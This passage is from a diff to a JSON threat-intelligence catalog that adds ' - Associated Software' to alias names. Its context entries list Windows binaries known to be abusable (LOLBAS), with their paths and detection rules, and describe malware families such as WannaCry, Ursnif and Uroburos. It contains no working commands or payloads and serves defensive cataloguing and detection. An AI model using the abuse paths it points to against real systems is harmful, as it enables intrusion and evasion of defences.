Project](/references/9ad11187-bf91-4205-98c7-c7b981e4ab6f)]", @@ -31966,7 +31966,7 @@ } ], "uuid": "c24db3d2-308c-4c4e-a6dd-58258013dc7e", - "value": "Update.exe" + "value": "Update.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* %localappdata%\\Microsoft\\Teams\\update.exe\n\n**Resources:**\n* [https://www.youtube.com/watch?v=rOP3hnkj7ls](https://www.youtube.com/watch?v=rOP3hnkj7ls)\n* [https://twitter.com/reegun21/status/1144182772623269889](https://twitter.com/reegun21/status/1144182772623269889)\n* [https://twitter.com/MrUn1k0d3r/status/1143928885211537408](https://twitter.com/MrUn1k0d3r/status/1143928885211537408)\n* [https://twitter.com/reegun21/status/1291005287034281990](https://twitter.com/reegun21/status/1291005287034281990)\n* [http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/](http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/)\n* [https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12](https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12)\n* [https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56](https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56)\n* [https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_squirrel.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml)\n* IOC: Update.exe spawned an unknown process[[Update.exe - LOLBAS Project](/references/2c85d5e5-2cb2-4af7-8c33-8aaac3360706)]", @@ -32006,7 +32006,7 @@ } ], "uuid": "d41b4a6c-7b79-494f-92e3-ea56db4cf988", - "value": "ANEL" + "value": "ANEL - Associated Software" }, { "description": "[UPPERCUT](https://app.tidalcyber.com/software/a3c211f8-52aa-4bfd-8382-940f2194af28) is a backdoor that has been used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322). [[FireEye APT10 Sept 2018](https://app.tidalcyber.com/references/5f122a27-2137-4016-a482-d04106187594)]", @@ -32051,7 +32051,7 @@ } ], "uuid": "274b601e-bc26-45b5-9532-3eca488c2c4a", - "value": "Url.dll" + "value": "Url.dll - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Internet Shortcut Shell Extension DLL.\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\url.dll\n* c:\\windows\\syswow64\\url.dll\n\n**Resources:**\n* [https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/](https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/)\n* [https://twitter.com/DissectMalware/status/995348436353470465](https://twitter.com/DissectMalware/status/995348436353470465)\n* [https://twitter.com/bohops/status/974043815655956481](https://twitter.com/bohops/status/974043815655956481)\n* [https://twitter.com/yeyint_mth/status/997355558070927360](https://twitter.com/yeyint_mth/status/997355558070927360)\n* [https://twitter.com/Hexacorn/status/974063407321223168](https://twitter.com/Hexacorn/status/974063407321223168)\n* [https://windows10dll.nirsoft.net/url_dll.html](https://windows10dll.nirsoft.net/url_dll.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)[[Url.dll - LOLBAS Project](/references/0c88fb72-6be5-4a01-af1c-553650779253)]", @@ -32092,7 +32092,7 @@ } ], "uuid": "d2f34441-00b4-41a5-aa43-17428b0fea39", - "value": "Snake" + "value": "Snake - Associated Software" }, { "description": "[Uroburos](https://app.tidalcyber.com/software/89ffc27c-b81f-473a-87d6-907cacdce61c) is a sophisticated cyber espionage tool written in C that has been used by units within Russia's Federal Security Service (FSB) associated with the [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) toolset to collect intelligence on sensitive targets worldwide. [Uroburos](https://app.tidalcyber.com/software/89ffc27c-b81f-473a-87d6-907cacdce61c) has several variants and has undergone nearly constant upgrade since its initial development in 2003 to keep it viable after public disclosures. [Uroburos](https://app.tidalcyber.com/software/89ffc27c-b81f-473a-87d6-907cacdce61c) is typically deployed to external-facing nodes on a targeted network and has the ability to leverage additional tools and TTPs to further exploit an internal network. [Uroburos](https://app.tidalcyber.com/software/89ffc27c-b81f-473a-87d6-907cacdce61c) has interoperable implants for Windows, Linux, and macOS, employs a high level of stealth in communications and architecture, and can easily incorporate new or replacement components.[[Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023](https://app.tidalcyber.com/references/1931b80a-effb-59ec-acae-c0f17efb8cad)][[Kaspersky Turla](https://app.tidalcyber.com/references/535e9f1a-f89e-4766-a290-c5b8100968f8)]", @@ -32140,7 +32140,7 @@ } ], "uuid": "18c4205c-8e09-42cb-9caa-0c62560e1977", - "value": "Gozi-ISFB" + "value": "Gozi-ISFB - Associated Software" }, { "description": "[[NJCCIC Ursnif Sept 2016](https://app.tidalcyber.com/references/d57a2efe-8c98-491e-aecd-e051241a1779)][[ProofPoint Ursnif Aug 2016](https://app.tidalcyber.com/references/4cef8c44-d440-4746-b3e8-c8e4d307273d)]", @@ -32154,7 +32154,7 @@ } ], "uuid": "788feb5e-d8f2-4f2b-8796-dd66b230213b", - "value": "Dreambot" + "value": "Dreambot - Associated Software" }, { "description": "[[TrendMicro Ursnif Mar 2015](https://app.tidalcyber.com/references/d02287df-9d93-4cbe-8e59-8f4ef3debc65)]", @@ -32168,7 +32168,7 @@ } ], "uuid": "0a7f6b16-335e-4e61-8c7d-75d08144eae4", - "value": "PE_URSNIF" + "value": "PE_URSNIF - Associated Software" }, { "description": "[Ursnif](https://app.tidalcyber.com/software/3e501609-87e4-4c47-bd88-5054be0f1037) is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291)s, and malicious links.[[NJCCIC Ursnif Sept 2016](https://app.tidalcyber.com/references/d57a2efe-8c98-491e-aecd-e051241a1779)][[ProofPoint Ursnif Aug 2016](https://app.tidalcyber.com/references/4cef8c44-d440-4746-b3e8-c8e4d307273d)] [Ursnif](https://app.tidalcyber.com/software/3e501609-87e4-4c47-bd88-5054be0f1037) is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.[[TrendMicro Ursnif Mar 2015](https://app.tidalcyber.com/references/d02287df-9d93-4cbe-8e59-8f4ef3debc65)]", @@ -32257,7 +32257,7 @@ } ], "uuid": "4f016c90-30ea-44b2-8c22-10d2fe2c6954", - "value": "USB Stealer" + "value": "USB Stealer - Associated Software" }, { "description": "", @@ -32271,7 +32271,7 @@ } ], "uuid": "2fbb693a-533b-4afb-91da-7e62ce0b3840", - "value": "Win32/USBStealer" + "value": "Win32/USBStealer - Associated Software" }, { "description": "[USBStealer](https://app.tidalcyber.com/software/50eab018-8d52-46f5-8252-95942c2c0a89) is malware that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://app.tidalcyber.com/software/ef7f4f5f-6f30-4059-87d1-cd8375bf1bee). [[ESET Sednit USBStealer 2014](https://app.tidalcyber.com/references/8673f7fc-5b23-432a-a2d8-700ece46bd0f)] [[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)]", @@ -32323,7 +32323,7 @@ } ], "uuid": "8ef743a4-8788-4bb2-8274-499f4c4f9392", - "value": "UtilityFunctions.ps1" + "value": "UtilityFunctions.ps1 - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** PowerShell Diagnostic Script\n\n**Author:** Jimmy (@bohops)\n\n**Paths:**\n* C:\\Windows\\diagnostics\\system\\Networking\\UtilityFunctions.ps1\n\n**Resources:**\n* [https://twitter.com/nickvangilder/status/1441003666274668546](https://twitter.com/nickvangilder/status/1441003666274668546)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbas_utilityfunctions.yml](https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml)[[UtilityFunctions.ps1 - LOLBAS Project](/references/8f15755b-2e32-420e-8463-497e3f8d8cfd)]", @@ -32446,7 +32446,7 @@ } ], "uuid": "1ad2a3ea-b488-439c-ab34-5cf15df250f3", - "value": "vbc.exe" + "value": "vbc.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary file used for compile vbs code\n\n**Author:** Lior Adar\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\vbc.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\vbc.exe\n\n**Resources:**\nNone Provided\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_visual_basic_compiler.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml)\n* Elastic: [defense_evasion_dotnet_compiler_parent_process.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml)[[vbc.exe - LOLBAS Project](/references/25eb4048-ee6d-44ca-a70b-37605028bd3c)]", @@ -32514,7 +32514,7 @@ } ], "uuid": "36aff35e-5b1e-4d4c-8690-492221812efd", - "value": "Verclsid.exe" + "value": "Verclsid.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used to verify a COM object before it is instantiated by Windows Explorer\n\n**Author:** @bohops\n\n**Paths:**\n* C:\\Windows\\System32\\verclsid.exe\n* C:\\Windows\\SysWOW64\\verclsid.exe\n\n**Resources:**\n* [https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5](https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5)\n* [https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/](https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/)\n\n**Detection:**\n* Sigma: [proc_creation_win_verclsid_runs_com.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml)\n* Splunk: [verclsid_clsid_execution.yml](https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/verclsid_clsid_execution.yml)[[LOLBAS Verclsid](/references/63ac9e95-aad8-4735-9e63-f45d8c499030)]", @@ -32606,7 +32606,7 @@ } ], "uuid": "a11ae9f6-5229-48cb-9350-fcabf73be98e", - "value": "VisualUiaVerifyNative.exe" + "value": "VisualUiaVerifyNative.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.\n\n**Author:** Jimmy (@bohops)\n\n**Paths:**\n* c:\\Program Files (x86)\\Windows Kits\\10\\bin\\[SDK version]\\arm64\\UIAVerify\\VisualUiaVerifyNative.exe\n* c:\\Program Files (x86)\\Windows Kits\\10\\bin\\[SDK version]\\x64\\UIAVerify\\VisualUiaVerifyNative.exe\n* c:\\Program Files (x86)\\Windows Kits\\10\\bin\\[SDK version]\\UIAVerify\\VisualUiaVerifyNative.exe\n\n**Resources:**\n* [https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/](https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/)\n* [https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad](https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad)\n\n**Detection:**\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* Sigma: [proc_creation_win_lolbin_visualuiaverifynative.yml](https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml)\n* IOC: As a Windows SDK binary, execution on a system may be suspicious[[VisualUiaVerifyNative.exe - LOLBAS Project](/references/b17be296-15ad-468f-8157-8cb4093b2e97)]", @@ -32674,7 +32674,7 @@ } ], "uuid": "17acae5f-d999-4a97-8cb1-546118e65b3b", - "value": "VSDiagnostics.exe" + "value": "VSDiagnostics.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Command-line tool used for performing diagnostics.\n\n**Author:** Bobby Cooke\n\n**Paths:**\n* C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe\n\n**Resources:**\n* [https://twitter.com/0xBoku/status/1679200664013135872](https://twitter.com/0xBoku/status/1679200664013135872)\n\n**Detection:**\n* Sigma: [https://github.com/tsale/Sigma_rules/blob/d5b4a09418edfeeb3a2d654f556d5bca82003cd7/LOL_BINs/VSDiagnostics_LoLBin.yml](https://github.com/tsale/Sigma_rules/blob/d5b4a09418edfeeb3a2d654f556d5bca82003cd7/LOL_BINs/VSDiagnostics_LoLBin.yml)[[VSDiagnostics.exe - LOLBAS Project](/references/b4658fc0-af16-45b1-8403-a9676760a36a)]", @@ -32716,7 +32716,7 @@ } ], "uuid": "012ea77d-0d1e-420f-8648-e4872647ea7b", - "value": "Vshadow.exe" + "value": "Vshadow.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** VShadow is a command-line tool that can be used to create and manage volume shadow copies.\n\n**Author:** Ayberk Halaç\n\n**Paths:**\n* C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.XXXXX.0\\x64\\vshadow.exe\n\n**Resources:**\n* [https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample](https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample)\n\n**Detection:**\n* IOC: vshadow.exe usage with -exec parameter[[Vshadow.exe - LOLBAS Project](/references/ae3b1e26-d7d7-4049-b4a7-80cd2b149b7c)]", @@ -32758,7 +32758,7 @@ } ], "uuid": "8b5cb79f-747e-48a5-8946-873ae62a5e0a", - "value": "VSIISExeLauncher.exe" + "value": "VSIISExeLauncher.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary will execute specified binary. Part of VS/VScode installation.\n\n**Author:** timwhite\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\Extensions\\Microsoft\\Web Tools\\ProjectSystem\\VSIISExeLauncher.exe\n\n**Resources:**\n* [https://github.com/timwhitez](https://github.com/timwhitez)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_vsiisexelauncher.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml)\n* IOC: VSIISExeLauncher.exe spawned an unknown process[[VSIISExeLauncher.exe - LOLBAS Project](/references/e2fda344-77b8-4650-a7da-1e422db6d3a1)]", @@ -32801,7 +32801,7 @@ } ], "uuid": "bf3acc6a-9193-48fc-b4bb-5cca12bfa006", - "value": "vsjitdebugger.exe" + "value": "vsjitdebugger.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Just-In-Time (JIT) debugger included with Visual Studio\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* c:\\windows\\system32\\vsjitdebugger.exe\n\n**Resources:**\n* [https://twitter.com/pabraeken/status/990758590020452353](https://twitter.com/pabraeken/status/990758590020452353)\n\n**Detection:**\n* Sigma: [proc_creation_win_susp_use_of_vsjitdebugger_bin.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml)[[vsjitdebugger.exe - LOLBAS Project](/references/94a880fa-70b0-46c3-997e-b22dc9180134)]", @@ -32844,7 +32844,7 @@ } ], "uuid": "f4a64cb4-78af-4343-8d36-1c2e63b943ee", - "value": "vsls-agent.exe" + "value": "vsls-agent.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Agent for Visual Studio Live Share (Code Collaboration)\n\n**Author:** Jimmy (@bohops)\n\n**Paths:**\n* c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\Extensions\\Microsoft\\LiveShare\\Agent\\vsls-agent.exe\n\n**Resources:**\n* [https://twitter.com/bohops/status/1583916360404729857](https://twitter.com/bohops/status/1583916360404729857)\n\n**Detection:**\n* Sigma: [proc_creation_win_vslsagent_agentextensionpath_load.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml)[[vsls-agent.exe - LOLBAS Project](/references/325eab54-bcdd-4a12-ab41-aaf06a0405e9)]", @@ -32887,7 +32887,7 @@ } ], "uuid": "eda03dc8-1816-4701-868f-c3c73ec62384", - "value": "vstest.console.exe" + "value": "vstest.console.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** VSTest.Console.exe is the command-line tool to run tests\n\n**Author:** Onat Uzunyayla\n\n**Paths:**\n* C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\TestAgent\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe\n\n**Resources:**\n* [https://learn.microsoft.com/en-us/visualstudio/test/vstest-console-options?view=vs-2022](https://learn.microsoft.com/en-us/visualstudio/test/vstest-console-options?view=vs-2022)\n\n**Detection:**\n* IOC: vstest.console.exe spawning unexpected processes[[vstest.console.exe - LOLBAS Project](/references/70c168a0-9ddf-408d-ba29-885c0c5c936a)]", @@ -32929,7 +32929,7 @@ } ], "uuid": "5de40634-9b96-422d-98e0-db9fe0dad5fb", - "value": "Wab.exe" + "value": "Wab.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows address book manager\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Program Files\\Windows Mail\\wab.exe\n* C:\\Program Files (x86)\\Windows Mail\\wab.exe\n\n**Resources:**\n* [https://twitter.com/Hexacorn/status/991447379864932352](https://twitter.com/Hexacorn/status/991447379864932352)\n* [http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/](http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/)\n\n**Detection:**\n* Sigma: [registry_set_wab_dllpath_reg_change.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml)\n* IOC: WAB.exe should normally never be used[[Wab.exe - LOLBAS Project](/references/c432556e-c7f9-4e36-af7e-d7bea6f51e95)]", @@ -32970,7 +32970,7 @@ } ], "uuid": "6d001330-b6ae-4e34-bd64-f1832b53047a", - "value": "WanaCrypt0r" + "value": "WanaCrypt0r - Associated Software" }, { "description": "[[LogRhythm WannaCry](https://app.tidalcyber.com/references/305d0742-154a-44af-8686-c6d8bd7f8636)][[SecureWorks WannaCry Analysis](https://app.tidalcyber.com/references/522b2a19-1d15-48f8-8801-c64d3abd945a)]", @@ -32984,7 +32984,7 @@ } ], "uuid": "16059e86-c89f-40de-a3e7-cee9f210228c", - "value": "WCry" + "value": "WCry - Associated Software" }, { "description": "[[SecureWorks WannaCry Analysis](https://app.tidalcyber.com/references/522b2a19-1d15-48f8-8801-c64d3abd945a)]", @@ -32998,7 +32998,7 @@ } ], "uuid": "a0cee897-ba88-4c1b-a1c6-f811baf608cc", - "value": "WanaCry" + "value": "WanaCry - Associated Software" }, { "description": "[[SecureWorks WannaCry Analysis](https://app.tidalcyber.com/references/522b2a19-1d15-48f8-8801-c64d3abd945a)]", @@ -33012,7 +33012,7 @@ } ], "uuid": "a4d2e9a7-b785-4385-b85e-51ea8f048de2", - "value": "WanaCrypt" + "value": "WanaCrypt - Associated Software" }, { "description": "[WannaCry](https://app.tidalcyber.com/software/6e7d1bcf-a308-4861-8aa5-0f4c6f126b0a) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.[[LogRhythm WannaCry](https://app.tidalcyber.com/references/305d0742-154a-44af-8686-c6d8bd7f8636)][[US-CERT WannaCry 2017](https://app.tidalcyber.com/references/349b8e9d-7172-4d01-b150-f0371d038b7e)][[Washington Post WannaCry 2017](https://app.tidalcyber.com/references/bbf9b08a-072c-4fb9-8c3c-cb6f91e8940c)][[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]", @@ -33076,7 +33076,7 @@ } ], "uuid": "50fda745-505f-47ca-b141-0ed2a48e5bfe", - "value": "Ave Maria" + "value": "Ave Maria - Associated Software" }, { "description": "", @@ -33090,7 +33090,7 @@ } ], "uuid": "d68a20f3-9abb-4c63-9df4-cb73bf291473", - "value": "Warzone" + "value": "Warzone - Associated Software" }, { "description": "[WarzoneRAT](https://app.tidalcyber.com/software/cfebe868-15cb-4be5-b7ed-38b52f2a0722) is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.[[Check Point Warzone Feb 2020](https://app.tidalcyber.com/references/c214c36e-2bc7-4b98-a74e-529aae99f9cf)][[Uptycs Warzone UAC Bypass November 2020](https://app.tidalcyber.com/references/1324b314-a4d9-43e7-81d6-70b6917fe527)]", @@ -33336,7 +33336,7 @@ } ], "uuid": "eda6736e-ffb9-4ef9-8d1a-38b3848e4ba4", - "value": "Wfc.exe" + "value": "Wfc.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).\n\n**Author:** Jimmy (@bohops)\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.8 Tools\\wfc.exe\n\n**Resources:**\n* [https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/](https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/)\n\n**Detection:**\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* Sigma: [proc_creation_win_lolbin_wfc.yml](https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml)\n* IOC: As a Windows SDK binary, execution on a system may be suspicious[[Wfc.exe - LOLBAS Project](/references/a937012a-01c8-457c-8808-47c1753e8781)]", @@ -33430,7 +33430,7 @@ } ], "uuid": "e0f8b025-b8bc-4878-b47e-5ea82fc334c8", - "value": "WCE" + "value": "WCE - Associated Software" }, { "description": "[Windows Credential Editor](https://app.tidalcyber.com/software/7c2c44d7-b307-4e13-b181-52352975a6f5) is a password dumping tool. [[Amplia WCE](https://app.tidalcyber.com/references/790ea33a-7a64-488e-ab90-d82e021e0c06)]", @@ -33626,7 +33626,7 @@ } ], "uuid": "d042aa21-d8f6-4cdc-bdd8-b304cbf5b71f", - "value": "winget.exe" + "value": "winget.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Package Manager tool\n\n**Author:** Paul Sanders\n\n**Paths:**\n* C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\winget.exe\n\n**Resources:**\n* [https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html](https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html)\n* [https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended](https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended)\n\n**Detection:**\n* IOC: winget.exe spawned with local manifest file\n* IOC: Sysmon Event ID 1 - Process Creation\n* Analysis: [https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html](https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html)\n* Sigma: [proc_creation_win_winget_local_install_via_manifest.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml)[[winget.exe - LOLBAS Project](/references/5ef334f3-fe6f-4cc1-b37d-d147180a8b8d)]", @@ -33773,7 +33773,7 @@ } ], "uuid": "65478a44-ca42-48cc-a03e-cd67353fc39f", - "value": "winrm.vbs" + "value": "winrm.vbs - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Script used for manage Windows RM settings\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\winrm.vbs\n* C:\\Windows\\SysWOW64\\winrm.vbs\n\n**Resources:**\n* 